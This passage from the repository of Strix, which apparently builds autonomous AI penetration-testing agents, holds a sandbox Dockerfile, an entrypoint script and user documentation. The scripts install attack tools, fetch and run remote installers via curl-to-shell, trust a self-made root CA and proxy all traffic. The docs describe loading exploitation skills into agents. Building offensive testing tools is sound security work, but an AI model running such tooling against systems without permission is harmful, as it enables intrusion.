libxrandr2 libgbm1 libxkbcommon0 libpango-1.0-0 libcairo2 libasound2t64 \\\n fonts-unifont fonts-noto-color-emoji fonts-freefont-ttf fonts-dejavu-core ttf-bitstream-vera \\\n libnss3-tools\n\n\nRUN setcap cap_net_raw,cap_net_admin,cap_net_bind_service+eip $(which nmap)\n\nUSER pentester\nRUN openssl ecparam -name prime256v1 -genkey -noout -out /app/certs/ca.key && \\\n openssl req -x509 -new -key /app/certs/ca.key \\\n -out /app/certs/ca.crt \\\n -days 3650 \\\n -subj \"/C=US/ST=CA/O=Security Testing/CN=Testing Root CA\" \\\n -addext \"basicConstraints=critical,CA:TRUE\" \\\n -addext \"keyUsage=critical,digitalSignature,keyEncipherment,keyCertSign\" && \\\n openssl pkcs12 -export \\\n -out /app/certs/ca.p12 \\\n -inkey /app/certs/ca.key \\\n -in /app/certs/ca.crt \\\n -passout pass:\"\" \\\n -name \"Testing Root CA\" && \\\n chmod 644 /app/certs/ca.crt && \\\n chmod 600 /app/certs/ca.key && \\\n chmod 600 /app/certs/ca.p12\n\nUSER root\nRUN cp /app/certs/ca.crt /usr/local/share/ca-certificates/ca.crt && \\\n update-ca-certificates\n\nRUN curl -sSL https://install.python-poetry.org | POETRY_HOME=/opt/poetry python3 - && \\\n ln -s /opt/poetry/bin/poetry /usr/local/bin/poetry && \\\n chmod +x /usr/local/bin/poetry && \\\n python3 -m venv /app/venv && \\\n chown -R pentester:pentester /app/venv /opt/poetry\n\nUSER pentester\nWORKDIR /tmp\n\nRUN go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest && \\\n go install -v github.com/projectdiscovery/katana/cmd/katana@latest && \\\n go install -v github.com/projectdiscovery/cvemap/cmd/vulnx@latest && \\\n go install -v github.com/jaeles-project/gospider@latest && \\\n go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest\n\nRUN nuclei -update-templates\n\nRUN pipx install arjun && \\\n pipx install dirsearch && \\\n pipx inject dirsearch setuptools && \\\n pipx install wafw00f\n\nENV NPM_CONFIG_PREFIX=/home/pentester/.npm-global\nRUN mkdir -p /home/pentester/.npm-global\n\nRUN npm install -g retire@latest && \\\n npm install -g eslint@latest && \\\n npm install -g js-beautify@latest\n\nWORKDIR /home/pentester/tools\nRUN git clone https://github.com/aravind0x7/JS-Snooper.git && \\\n chmod +x JS-Snooper/js_snooper.sh && \\\n git clone https://github.com/xchopath/jsniper.sh.git && \\\n chmod +x jsniper.sh/jsniper.sh && \\\n git clone https://github.com/ticarpi/jwt_tool.git && \\\n chmod +x jwt_tool/jwt_tool.py\n\nUSER root\n\nRUN curl -sSfL https://raw.githubusercontent.com/trufflesecurity/trufflehog/main/scripts/install.sh | sh -s -- -b /usr/local/bin\n\nRUN apt-get update && apt-get install -y zaproxy\n\nRUN curl -sfL https://raw.githubusercontent.com/aquasecurity/trivy/main/contrib/install.sh | sh -s -- -b /usr/local/bin\n\nRUN apt-get install -y wapiti\n\nUSER pentester\n\nRUN pipx install semgrep && \\\n pipx install bandit\n\nRUN npm install -g jshint\n\nUSER root\n\nRUN apt-get autoremove -y && \\\n apt-get autoclean && \\\n rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/*\n\nENV PATH=\"/home/pentester/go/bin:/home/pentester/.local/bin:/home/pentester/.npm-global/bin:/app/venv/bin:$PATH\"\nENV VIRTUAL_ENV=\"/app/venv\"\nENV POETRY_HOME=\"/opt/poetry\"\n\nWORKDIR /app\n\nRUN ARCH=$(uname -m) && \\\n if [ \"$ARCH\" = \"x86_64\" ]; then \\\n CAIDO_ARCH=\"x86_64\"; \\\n elif [ \"$ARCH\" = \"aarch64\" ] || [ \"$ARCH\" = \"arm64\" ]; then \\\n CAIDO_ARCH=\"aarch64\"; \\\n else \\\n echo \"Unsupported architecture: $ARCH\" && exit 1; \\\n fi && \\\n wget -O caido-cli.tar.gz https://caido.download/releases/v0.48.0/caido-cli-v0.48.0-linux-${CAIDO_ARCH}.tar.gz && \\\n tar -xzf caido-cli.tar.gz && \\\n chmod +x caido-cli && \\\n rm caido-cli.tar.gz && \\\n mv caido-cli /usr/local/bin/\n\nENV STRIX_SANDBOX_MODE=true\nENV PYTHONPATH=/app\nENV REQUESTS_CA_BUNDLE=/etc/ssl/certs/ca-certificates.crt\nENV SSL_CERT_FILE=/etc/ssl/certs/ca-certificates.crt\n\nRUN mkdir -p /workspace && chown -R pentester:pentester /workspace /app\n\nCOPY pyproject.toml poetry.lock ./\n\nUSER pentester\nRUN poetry install --no-root --without dev --extras sandbox\nRUN poetry run playwright install chromium\n\nRUN /app/venv/bin/pip install -r /home/pentester/tools/jwt_tool/requirements.txt && \\\n ln -s /home/pentester/tools/jwt_tool/jwt_tool.py /home/pentester/.local/bin/jwt_tool\n\nRUN echo \"# Sandbox Environment\" > README.md\n\nCOPY strix/__init__.py strix/\nCOPY strix/config/ /app/strix/config/\nCOPY strix/utils/ /app/strix/utils/\nCOPY strix/telemetry/ /app/strix/telemetry/\nCOPY strix/runtime/tool_server.py strix/runtime/__init__.py strix/runtime/runtime.py /app/strix/runtime/\n\nCOPY strix/tools/__init__.py strix/tools/registry.py strix/tools/executor.py strix/tools/argument_parser.py strix/tools/context.py /app/strix/tools/\n\nCOPY strix/tools/browser/ /app/strix/tools/browser/\nCOPY strix/tools/file_edit/ /app/strix/tools/file_edit/\nCOPY strix/tools/notes/ /app/strix/tools/notes/\nCOPY strix/tools/python/ /app/strix/tools/python/\nCOPY strix/tools/terminal/ /app/strix/tools/terminal/\nCOPY strix/tools/proxy/ /app/strix/tools/proxy/\n\nRUN echo 'export PATH=\"/home/pentester/go/bin:/home/pentester/.local/bin:/home/pentester/.npm-global/bin:$PATH\"' >> /home/pentester/.bashrc && \\\n echo 'export PATH=\"/home/pentester/go/bin:/home/pentester/.local/bin:/home/pentester/.npm-global/bin:$PATH\"' >> /home/pentester/.profile\n\nUSER root\nCOPY containers/docker-entrypoint.sh /usr/local/bin/docker-entrypoint.sh\nRUN chmod +x /usr/local/bin/docker-entrypoint.sh\n\nUSER pentester\nWORKDIR /workspace\n\nENTRYPOINT [\"docker-entrypoint.sh\"]\n" }, { "path": "containers/docker-entrypoint.sh", "content": "#!/bin/bash\nset -e\n\nCAIDO_PORT=48080\nCAIDO_LOG=\"/tmp/caido_startup.log\"\n\nif [ ! -f /app/certs/ca.p12 ]; then\n echo \"ERROR: CA certificate file /app/certs/ca.p12 not found.\"\n exit 1\nfi\n\ncaido-cli --listen 0.0.0.0:${CAIDO_PORT} \\\n --allow-guests \\\n --no-logging \\\n --no-open \\\n --import-ca-cert /app/certs/ca.p12 \\\n --import-ca-cert-pass \"\" > \"$CAIDO_LOG\" 2>&1 &\n\nCAIDO_PID=$!\necho \"Started Caido with PID $CAIDO_PID on port $CAIDO_PORT\"\n\necho \"Waiting for Caido API to be ready...\"\nCAIDO_READY=false\nfor i in {1..30}; do\n if ! kill -0 $CAIDO_PID 2>/dev/null; then\n echo \"ERROR: Caido process died while waiting for API (iteration $i).\"\n echo \"=== Caido log ===\"\n cat \"$CAIDO_LOG\" 2>/dev/null || echo \"(no log available)\"\n exit 1\n fi\n\n if curl -s -o /dev/null -w \"%{http_code}\" http://localhost:${CAIDO_PORT}/graphql/ | grep -qE \"^(200|400)$\"; then\n echo \"Caido API is ready (attempt $i).\"\n CAIDO_READY=true\n break\n fi\n sleep 1\ndone\n\nif [ \"$CAIDO_READY\" = false ]; then\n echo \"ERROR: Caido API did not become ready within 30 seconds.\"\n echo \"Caido process status: $(kill -0 $CAIDO_PID 2>&1 && echo 'running' || echo 'dead')\"\n echo \"=== Caido log ===\"\n cat \"$CAIDO_LOG\" 2>/dev/null || echo \"(no log available)\"\n exit 1\nfi\n\nsleep 2\n\necho \"Fetching API token...\"\nTOKEN=\"\"\nfor attempt in 1 2 3 4 5; do\n RESPONSE=$(curl -sL -X POST \\\n -H \"Content-Type: application/json\" \\\n -d '{\"query\":\"mutation LoginAsGuest { loginAsGuest { token { accessToken } } }\"}' \\\n http://localhost:${CAIDO_PORT}/graphql)\n\n TOKEN=$(echo \"$RESPONSE\" | jq -r '.data.loginAsGuest.token.accessToken // empty')\n\n if [ -n \"$TOKEN\" ] && [ \"$TOKEN\" != \"null\" ]; then\n echo \"Successfully obtained API token (attempt $attempt).\"\n break\n fi\n\n echo \"Token fetch attempt $attempt failed: $RESPONSE\"\n sleep $((attempt * 2))\ndone\n\nif [ -z \"$TOKEN\" ] || [ \"$TOKEN\" == \"null\" ]; then\n echo \"ERROR: Failed to get API token from Caido after 5 attempts.\"\n echo \"=== Caido log ===\"\n cat \"$CAIDO_LOG\" 2>/dev/null || echo \"(no log available)\"\n exit 1\nfi\n\nexport CAIDO_API_TOKEN=$TOKEN\necho \"Caido API token has been set.\"\n\necho \"Creating a new Caido project...\"\nCREATE_PROJECT_RESPONSE=$(curl -sL -X POST \\\n -H \"Content-Type: application/json\" \\\n -H \"Authorization: Bearer $TOKEN\" \\\n -d '{\"query\":\"mutation CreateProject { createProject(input: {name: \\\"sandbox\\\", temporary: true}) { project { id } } }\"}' \\\n http://localhost:${CAIDO_PORT}/graphql)\n\nPROJECT_ID=$(echo $CREATE_PROJECT_RESPONSE | jq -r '.data.createProject.project.id')\n\nif [ -z \"$PROJECT_ID\" ] || [ \"$PROJECT_ID\" == \"null\" ]; then\n echo \"Failed to create Caido project.\"\n echo \"Response: $CREATE_PROJECT_RESPONSE\"\n exit 1\nfi\n\necho \"Caido project created with ID: $PROJECT_ID\"\n\necho \"Selecting Caido project...\"\nSELECT_RESPONSE=$(curl -sL -X POST \\\n -H \"Content-Type: application/json\" \\\n -H \"Authorization: Bearer $TOKEN\" \\\n -d '{\"query\":\"mutation SelectProject { selectProject(id: \\\"'$PROJECT_ID'\\\") { currentProject { project { id } } } }\"}' \\\n http://localhost:${CAIDO_PORT}/graphql)\n\nSELECTED_ID=$(echo $SELECT_RESPONSE | jq -r '.data.selectProject.currentProject.project.id')\n\nif [ \"$SELECTED_ID\" != \"$PROJECT_ID\" ]; then\n echo \"Failed to select Caido project.\"\n echo \"Response: $SELECT_RESPONSE\"\n exit 1\nfi\n\necho \"βœ… Caido project selected successfully.\"\n\necho \"Configuring system-wide proxy settings...\"\n\ncat << EOF | sudo tee /etc/profile.d/proxy.sh\nexport http_proxy=http://127.0.0.1:${CAIDO_PORT}\nexport https_proxy=http://127.0.0.1:${CAIDO_PORT}\nexport HTTP_PROXY=http://127.0.0.1:${CAIDO_PORT}\nexport HTTPS_PROXY=http://127.0.0.1:${CAIDO_PORT}\nexport ALL_PROXY=http://127.0.0.1:${CAIDO_PORT}\nexport REQUESTS_CA_BUNDLE=/etc/ssl/certs/ca-certificates.crt\nexport SSL_CERT_FILE=/etc/ssl/certs/ca-certificates.crt\nexport CAIDO_API_TOKEN=${TOKEN}\nEOF\n\ncat << EOF | sudo tee /etc/environment\nhttp_proxy=http://127.0.0.1:${CAIDO_PORT}\nhttps_proxy=http://127.0.0.1:${CAIDO_PORT}\nHTTP_PROXY=http://127.0.0.1:${CAIDO_PORT}\nHTTPS_PROXY=http://127.0.0.1:${CAIDO_PORT}\nALL_PROXY=http://127.0.0.1:${CAIDO_PORT}\nCAIDO_API_TOKEN=${TOKEN}\nEOF\n\ncat << EOF | sudo tee /etc/wgetrc\nuse_proxy=yes\nhttp_proxy=http://127.0.0.1:${CAIDO_PORT}\nhttps_proxy=http://127.0.0.1:${CAIDO_PORT}\nEOF\n\necho \"source /etc/profile.d/proxy.sh\" >> ~/.bashrc\necho \"source /etc/profile.d/proxy.sh\" >> ~/.zshrc\n\nsource /etc/profile.d/proxy.sh\n\necho \"βœ… System-wide proxy configuration complete\"\n\necho \"Adding CA to browser trust store...\"\nsudo -u pentester mkdir -p /home/pentester/.pki/nssdb\nsudo -u pentester certutil -N -d sql:/home/pentester/.pki/nssdb --empty-password\nsudo -u pentester certutil -A -n \"Testing Root CA\" -t \"C,,\" -i /app/certs/ca.crt -d sql:/home/pentester/.pki/nssdb\necho \"βœ… CA added to browser trust store\"\n\necho \"Starting tool server...\"\ncd /app\nexport PYTHONPATH=/app\nexport STRIX_SANDBOX_MODE=true\nexport POETRY_VIRTUALENVS_CREATE=false\nexport TOOL_SERVER_TIMEOUT=\"${STRIX_SANDBOX_EXECUTION_TIMEOUT:-120}\"\nTOOL_SERVER_LOG=\"/tmp/tool_server.log\"\n\nsudo -E -u pentester \\\n poetry run python -m strix.runtime.tool_server \\\n --token=\"$TOOL_SERVER_TOKEN\" \\\n --host=0.0.0.0 \\\n --port=\"$TOOL_SERVER_PORT\" \\\n --timeout=\"$TOOL_SERVER_TIMEOUT\" > \"$TOOL_SERVER_LOG\" 2>&1 &\n\nfor i in {1..10}; do\n if curl -s \"http://127.0.0.1:$TOOL_SERVER_PORT/health\" | grep -q '\"status\":\"healthy\"'; then\n echo \"βœ… Tool server healthy on port $TOOL_SERVER_PORT\"\n break\n fi\n if [ $i -eq 10 ]; then\n echo \"ERROR: Tool server failed to become healthy\"\n echo \"=== Tool server log ===\"\n cat \"$TOOL_SERVER_LOG\" 2>/dev/null || echo \"(no log)\"\n exit 1\n fi\n sleep 1\ndone\n\necho \"βœ… Container ready\"\n\ncd /workspace\nexec \"$@\"\n" }, { "path": "docs/README.md", "content": "# Strix Documentation\n\nDocumentation source files for Strix, powered by [Mintlify](https://mintlify.com).\n\n## Local Preview\n\n```bash\nnpm i -g mintlify\ncd docs && mintlify dev\n```\n" }, { "path": "docs/advanced/configuration.mdx", "content": "---\ntitle: \"Configuration\"\ndescription: \"Environment variables for Strix\"\n---\n\nConfigure Strix using environment variables or a config file.\n\n## LLM Configuration\n\n\n Model name in LiteLLM format (e.g., `openai/gpt-5`, `anthropic/claude-sonnet-4-6`).\n\n\n\n API key for your LLM provider. Not required for local models or cloud provider auth (Vertex AI, AWS Bedrock).\n\n\n\n Custom API base URL. Also accepts `OPENAI_API_BASE`, `LITELLM_BASE_URL`, or `OLLAMA_API_BASE`.\n\n\n\n Request timeout in seconds for LLM calls.\n\n\n\n Maximum number of retries for LLM API calls on transient failures.\n\n\n\n Control thinking effort for reasoning models. Valid values: `none`, `minimal`, `low`, `medium`, `high`, `xhigh`. Defaults to `medium` for quick scan mode.\n\n\n\n Timeout in seconds for memory compression operations (context summarization).\n\n\n## Optional Features\n\n\n API key for Perplexity AI. Enables real-time web search during scans for OSINT and vulnerability research.\n\n\n\n Disable browser automation tools.\n\n\n\n Global telemetry default toggle. Set to `0`, `false`, `no`, or `off` to disable both PostHog and OTEL unless overridden by per-channel flags below.\n\n\n\n Enable/disable OpenTelemetry run observability independently. When unset, falls back to `STRIX_TELEMETRY`.\n\n\n\n Enable/disable PostHog product telemetry independently. When unset, falls back to `STRIX_TELEMETRY`.\n\n\n\n OTLP/Traceloop base URL for remote OpenTelemetry export. If unset, Strix keeps traces local only.\n\n\n\n API key used for remote trace export. Remote export is enabled only when both `TRACELOOP_BASE_URL` and `TRACELOOP_API_KEY` are set.\n\n\n\n Optional custom OTEL headers (JSON object or `key=value,key2=value2`). Useful for Langfuse or custom/self-hosted OTLP gateways.\n\n\nWhen remote OTEL vars are not set, Strix still writes complete run telemetry locally to:\n\n```bash\nstrix_runs//events.jsonl\n```\n\nWhen remote vars are set, Strix dual-writes telemetry to both local JSONL and the remote OTEL endpoint.\n\n## Docker Configuration\n\n\n Docker image to use for the sandbox container.\n\n\n\n Docker daemon socket path. Use for remote Docker hosts or custom configurations.\n\n\n\n Runtime backend for the sandbox environment.\n\n\n## Sandbox Configuration\n\n\n Maximum execution time in seconds for sandbox operations.\n\n\n\n Timeout in seconds for connecting to the sandbox container.\n\n\n## Config File\n\nStrix stores configuration in `~/.strix/cli-config.json`. You can also specify a custom config file:\n\n```bash\nstrix --target ./app --config /path/to/config.json\n```\n\n**Config file format:**\n\n```json\n{\n \"env\": {\n \"STRIX_LLM\": \"openai/gpt-5\",\n \"LLM_API_KEY\": \"sk-...\",\n \"STRIX_REASONING_EFFORT\": \"high\"\n }\n}\n```\n\n## Example Setup\n\n```bash\n# Required\nexport STRIX_LLM=\"openai/gpt-5\"\nexport LLM_API_KEY=\"sk-...\"\n\n# Optional: Enable web search\nexport PERPLEXITY_API_KEY=\"pplx-...\"\n\n# Optional: Custom timeouts\nexport LLM_TIMEOUT=\"600\"\nexport STRIX_SANDBOX_EXECUTION_TIMEOUT=\"300\"\n\n```\n" }, { "path": "docs/advanced/skills.mdx", "content": "---\ntitle: \"Skills\"\ndescription: \"Specialized knowledge packages that enhance agent capabilities\"\n---\n\nSkills are structured knowledge packages that give Strix agents deep expertise in specific vulnerability types, technologies, and testing methodologies.\n\n## The Idea\n\nLLMs have broad but shallow security knowledge. They know _about_ SQL injection, but lack the nuanced techniques that experienced pentesters useβ€”parser quirks, bypass methods, validation tricks, and chain attacks.\n\nSkills inject this deep, specialized knowledge directly into the agent's context, transforming it from a generalist into a specialist for the task at hand.\n\n## How They Work\n\nWhen Strix spawns an agent for a specific task, it selects up to 5 relevant skills based on the context:\n\n```python\n# Agent created for JWT testing automatically loads relevant skills\ncreate_agent(\n task=\"Test authentication mechanisms\",\n skills=[\"authentication_jwt\", \"business_logic\"]\n)\n```\n\nThe skills are injected into the agent's system prompt, giving it access to:\n\n- **Advanced techniques** β€” Non-obvious methods beyond standard testing\n- **Working payloads** β€” Practical examples with variations\n- **Validation methods** β€” How to confirm findings and avoid false positives\n\n## Skill Categories\n\n### Vulnerabilities\n\nCore vulnerability classes with deep exploitation techniques.\n\n| Skill | Coverage |\n| ------------------------------------- | ------------------------------------------------------ |\n| `authentication_jwt` | JWT attacks, algorithm confusion, claim tampering |\n| `idor` | Object reference attacks, horizontal/vertical access |\n| `sql_injection` | SQL injection variants, WAF bypasses, blind techniques |\n| `xss` | XSS types, filter bypasses, DOM exploitation |\n| `ssrf` | Server-side request forgery, protocol handlers |\n| `csrf` | Cross-site request forgery, token bypasses |\n| `xxe` | XML external entities, OOB exfiltration |\n| `rce` | Remote code execution vectors |\n| `business_logic` | Logic flaws, state manipulation, race conditions |\n| `race_conditions` | TOCTOU, parallel request attacks |\n| `path_traversal_lfi_rfi` | File inclusion, path traversal |\n| `open_redirect` | Redirect bypasses, URL parsing tricks |\n| `mass_assignment` | Attribute injection, hidden parameter pollution |\n| `insecure_file_uploads` | Upload bypasses, extension tricks |\n| `information_disclosure` | Data leakage, error-based enumeration |\n| `subdomain_takeover` | Dangling DNS, cloud resource claims |\n| `broken_function_level_authorization` | Privilege escalation, role bypasses |\n\n### Frameworks\n\nFramework-specific testing patterns.\n\n| Skill | Coverage |\n| --------- | -------------------------------------------- |\n| `fastapi` | FastAPI security patterns, Pydantic bypasses |\n| `nextjs` | Next.js SSR/SSG issues, API route security |\n\n### Technologies\n\nThird-party service and platform security.\n\n| Skill | Coverage |\n| -------------------- | ---------------------------------- |\n| `supabase` | Supabase RLS bypasses, auth issues |\n| `firebase_firestore` | Firestore rules, Firebase auth |\n\n### Protocols\n\nProtocol-specific testing techniques.\n\n| Skill | Coverage |\n| --------- | ------------------------------------------------ |\n| `graphql` | GraphQL introspection, batching, resolver issues |\n\n### Tooling\n\nSandbox CLI playbooks for core recon and scanning tools.\n\n| Skill | Coverage |\n| ----------- | ------------------------------------------------------- |\n| `nmap` | Port/service scan syntax and high-signal scan patterns |\n| `nuclei` | Template selection, severity filtering, and rate tuning |\n| `httpx` | HTTP probing and fingerprint output patterns |\n| `ffuf` | Wordlist fuzzing, matcher/filter strategy, recursion |\n| `subfinder` | Passive subdomain enumeration and source control |\n| `naabu` | Fast port scanning with explicit rate/verify controls |\n| `katana` | Crawl depth/JS/known-files behavior and pitfalls |\n| `sqlmap` | SQLi workflow for enumeration and controlled extraction |\n\n## Skill Structure\n\nEach skill is a Markdown file with YAML frontmatter for metadata:\n\n```markdown\n---\nname: skill_name\ndescription: Brief description of the skill's coverage\n---\n\n# Skill Title\n\nKey insight about this vulnerability or technique.\n\n## Attack Surface\nWhat this skill covers and where to look.\n\n## Methodology\nStep-by-step testing approach.\n\n## Techniques\nHow to discover and exploit the vulnerability.\n\n## Bypass Methods\nHow to bypass common protections.\n\n## Validation\nHow to confirm findings and avoid false positives.\n```\n\n## Contributing Skills\n\nCommunity contributions are welcome. Create a `.md` file in the appropriate category with YAML frontmatter (`name` and `description` fields). Good skills include:\n\n1. **Real-world techniques** β€” Methods that work in practice\n2. **Practical payloads** β€” Working examples with variations\n3. **Validation steps** β€” How to confirm without false positives\n4. **Context awareness** β€” Version/environment-specific behavior\n" }, { "path": "docs/cloud/overview.mdx", "content": "---\ntitle: \"Introduction\"\ndescription: \"Managed security testing without local setup\"\n---\n\nSkip the setup. Run Strix in the cloud at [app.strix.ai](https://app.strix.ai).\n\n## Features\n\n\n \n No Docker, API keys, or local installation needed.\n \n \n Detailed findings with remediation guidance.\n \n \n Track vulnerabilities and fixes over time.\n \n \n Automatic scans on pull requests.\n \n\n\n## What You Get\n\n- **Penetration test reports** β€” Validated findings with PoCs\n- **Shareable dashboards** β€” Collaborate with your team\n- **CI/CD integration** β€” Block risky changes automatically\n- **Continuous monitoring** β€” Catch new vulnerabilities quickly\n\n## Getting Started\n\n1. Sign up at [app.strix.ai](https://app.strix.ai)\n2. Connect your repository or enter a target URL\n3. Launch your first scan\n\n\n Run your first pentest in minutes.\n\n" }, { "path": "docs/contributing.mdx", "content": "---\ntitle: \"Contributing\"\ndescription: \"Contribute to Strix development\"\n---\n\n## Development Setup\n\n### Prerequisites\n\n- Python 3.12+\n- Docker (running)\n- Poetry\n- Git\n\n### Local Development\n\n\n \n ```bash\n git clone https://github.com/usestrix/strix.git\n cd strix\n ```\n \n \n ```bash\n make setup-dev\n\n # or manually:\n poetry install --with=dev\n poetry run pre-commit install\n ```\n \n \n ```bash\n export STRIX_LLM=\"openai/gpt-5\"\n export LLM_API_KEY=\"your-api-key\"\n ```\n \n \n ```bash\n poetry run strix --target https://example.com\n ```\n \n\n\n## Contributing Skills\n\nSkills are specialized knowledge packages that enhance agent capabilities. They live in `strix/skills/`\n\n### Creating a Skill\n\n1. Choose the right category\n2. Create a `.md` file with YAML frontmatter (`name` and `description` fields)\n3. Include practical examplesβ€”working payloads, commands, test cases\n4. Provide validation methods to confirm findings\n5. Submit via PR\n\n## Contributing Code\n\n### Pull Request Process\n\n1. **Create an issue first** β€” Describe the problem or feature\n2. **Fork and branch** β€” Work from `main`\n3. **Make changes** β€” Follow existing code style\n4. **Write tests** β€” Ensure coverage for new features\n5. **Run checks** β€” `make check-all` should pass\n6. **Submit PR** β€” Link to issue and provide context\n\n### Code Style\n\n- PEP 8 with 100-character line limit\n- Type hints for all functions\n- Docstrings for public methods\n- Small, focused functions\n- Meaningful variable names\n\n## Reporting Issues\n\nInclude:\n\n- Python version and OS\n- Strix version (`strix --version`)\n- LLM being used\n- Full error traceback\n- Steps to reproduce\n\n## Community\n\n\n \n Join the community for help and discussion.\n \n \n Report bugs and request features.\n \n\n" }, { "path": "docs/docs.json", "content": "{\n \"$schema\": \"https://mintlify.com/docs.json\",\n \"theme\": \"maple\",\n \"name\": \"Strix\",\n \"colors\": {\n \"primary\": \"#000000\",\n \"light\": \"#ffffff\",\n \"dark\": \"#000000\"\n },\n \"favicon\": \"/images/favicon-48.ico\",\n \"navigation\": {\n \"tabs\": [\n {\n \"tab\": \"Documentation\",\n \"groups\": [\n {\n \"group\": \"Getting Started\",\n \"pages\": [\n \"index\",\n \"quickstart\"\n ]\n },\n {\n \"group\": \"Usage\",\n \"pages\": [\n \"usage/cli\",\n \"usage/scan-modes\",\n \"usage/instructions\"\n ]\n },\n {\n \"group\": \"LLM Providers\",\n \"pages\": [\n \"llm-providers/overview\",\n \"llm-providers/models\",\n \"llm-providers/openai\",\n \"llm-providers/anthropic\",\n \"llm-providers/openrouter\",\n \"llm-providers/vertex\",\n \"llm-providers/bedrock\",\n \"llm-providers/azure\",\n \"llm-providers/local\"\n ]\n },\n {\n \"group\": \"Integrations\",\n \"pages\": [\n \"integrations/github-actions\",\n \"integrations/ci-cd\"\n ]\n },\n {\n \"group\": \"Tools\",\n \"pages\": [\n \"tools/overview\",\n \"tools/browser\",\n \"tools/proxy\",\n \"tools/terminal\",\n \"tools/sandbox\"\n ]\n },\n {\n \"group\": \"Advanced\",\n \"pages\": [\n \"advanced/configuration\",\n \"advanced/skills\",\n \"contributing\"\n ]\n }\n ]\n },\n {\n \"tab\": \"Cloud\",\n \"groups\": [\n {\n \"group\": \"Strix Cloud\",\n \"pages\": [\n \"cloud/overview\"\n ]\n }\n ]\n }\n ],\n \"global\": {\n \"anchors\": [\n {\n \"anchor\": \"GitHub\",\n \"href\": \"https://github.com/usestrix/strix\",\n \"icon\": \"github\"\n },\n {\n \"anchor\": \"Discord\",\n \"href\": \"https://discord.gg/strix-ai\",\n \"icon\": \"discord\"\n }\n ]\n }\n },\n \"navbar\": {\n \"links\": [],\n \"primary\": {\n \"type\": \"button\",\n \"label\": \"Try Strix Cloud\",\n \"href\": \"https://app.strix.ai\"\n }\n },\n \"footer\": {\n \"socials\": {\n \"x\": \"https://x.com/strix_ai\",\n \"github\": \"https://github.com/usestrix\",\n \"discord\": \"https://discord.gg/strix-ai\"\n }\n },\n \"fonts\": {\n \"family\": \"Geist\",\n \"heading\": {\n \"family\": \"Geist\"\n },\n \"body\": {\n \"family\": \"Geist\"\n }\n },\n \"appearance\": {\n \"default\": \"dark\"\n },\n \"description\": \"Open-source AI Hackers to secure your Apps\",\n \"background\": {\n \"decoration\": \"grid\"\n }\n}\n" }, { "path": "docs/index.mdx", "content": "---\ntitle: \"Introduction\"\ndescription: \"Open-source AI hackers to secure your apps\"\n---\n\nStrix are autonomous AI agents that act like real hackersβ€”they run your code dynamically, find vulnerabilities, and validate them with proof-of-concepts. Built for developers and security teams who need fast, accurate security testing without the overhead of manual pentesting or the false positives of static analysis tools.\n\n\n \"Strix\n\n\n\n \n Install and run your first scan in minutes.\n \n \n Learn all command-line options.\n \n \n Explore the security testing toolkit.\n \n \n Integrate into your CI/CD pipeline.\n \n\n\n## Use Cases\n\n- **Application Security Testing** β€” Detect and validate critical vulnerabilities in your applications\n- **Rapid Penetration Testing** β€” Get penetration tests done in hours, not weeks\n- **Bug Bounty Automation** β€” Automate research and generate PoCs for faster reporting\n- **CI/CD Integration** β€” Block vulnerabilities before they reach production\n\n## Key Capabilities\n\n- **Full hacker toolkit** β€” Browser automation, HTTP proxy, terminal, Python runtime\n- **Real validation** β€” PoCs, not false positives\n- **Multi-agent orchestration** β€” Specialized agents collaborate on complex targets\n- **Developer-first CLI** β€” Interactive TUI or headless mode for automation\n\n## Security Tools\n\nStrix agents come equipped with a comprehensive toolkit:\n\n| Tool | Purpose |\n|------|---------|\n| HTTP Proxy | Full request/response manipulation and analysis |\n| Browser Automation | Multi-tab browser for XSS, CSRF, auth flow testing |\n| Terminal | Interactive shells for command execution |\n| Python Runtime | Custom exploit development and validation |\n| Reconnaissance | Automated OSINT and attack surface mapping |\n| Code Analysis | Static and dynamic analysis capabilities |\n\n## Vulnerability Coverage\n\n| Category | Examples |\n|----------|----------|\n| Access Control | IDOR, privilege escalation, auth bypass |\n| Injection | SQL, NoSQL, command injection |\n| Server-Side | SSRF, XXE, deserialization |\n| Client-Side | XSS, prototype pollution, DOM vulnerabilities |\n| Business Logic | Race conditions, workflow manipulation |\n| Authentication | JWT vulnerabilities, session management |\n| Infrastructure | Misconfigurations, exposed services |\n\n## Multi-Agent Architecture\n\nStrix uses a graph of specialized agents for comprehensive security testing:\n\n- **Distributed Workflows** β€” Specialized agents for different attacks and assets\n- **Scalable Testing** β€” Parallel execution for fast comprehensive coverage\n- **Dynamic Coordination** β€” Agents collaborate and share discoveries\n\n## Quick Example\n\n```bash\n# Install\ncurl -sSL https://strix.ai/install | bash\n\n# Configure\nexport STRIX_LLM=\"openai/gpt-5\"\nexport LLM_API_KEY=\"your-api-key\"\n\n# Scan\nstrix --target ./your-app\n```\n\n## Community\n\n\n \n Join the community for help and discussion.\n \n \n Star the repo and contribute.\n \n\n\n\nOnly test applications you own or have explicit permission to test.\n\n" }, { "path": "docs/integrations/ci-cd.mdx", "content": "---\ntitle: \"CI/CD Integration\"\ndescription: \"Run Strix in any CI/CD pipeline\"\n---\n\nStrix runs in headless mode for automated pipelines.\n\n## Headless Mode\n\nUse the `-n` or `--non-interactive` flag:\n\n```bash\nstrix -n --target ./app --scan-mode quick\n```\n\n## Exit Codes\n\n| Code | Meaning |\n|------|---------|\n| 0 | No vulnerabilities found |\n| 1 | Execution error |\n| 2 | Vulnerabilities found |\n\n## GitLab CI\n\n```yaml .gitlab-ci.yml\nsecurity-scan:\n image: docker:latest\n services:\n - docker:dind\n variables:\n STRIX_LLM: $STRIX_LLM\n LLM_API_KEY: $LLM_API_KEY\n script:\n - curl -sSL https://strix.ai/install | bash\n - strix -n -t ./ --scan-mode quick\n```\n\n## Jenkins\n\n```groovy Jenkinsfile\npipeline {\n agent any\n environment {\n STRIX_LLM = credentials('strix-llm')\n LLM_API_KEY = credentials('llm-api-key')\n }\n stages {\n stage('Security Scan') {\n steps {\n sh 'curl -sSL https://strix.ai/install | bash'\n sh 'strix -n -t ./ --scan-mode quick'\n }\n }\n }\n}\n```\n\n## CircleCI\n\n```yaml .circleci/config.yml\nversion: 2.1\njobs:\n security-scan:\n docker:\n - image: cimg/base:current\n steps:\n - checkout\n - setup_remote_docker\n - run:\n name: Install Strix\n command: curl -sSL https://strix.ai/install | bash\n - run:\n name: Run Scan\n command: strix -n -t ./ --scan-mode quick\n```\n\n\nAll CI platforms require Docker access. Ensure your runner has Docker available.\n\n" }, { "path": "docs/integrations/github-actions.mdx", "content": "---\ntitle: \"GitHub Actions\"\ndescription: \"Run 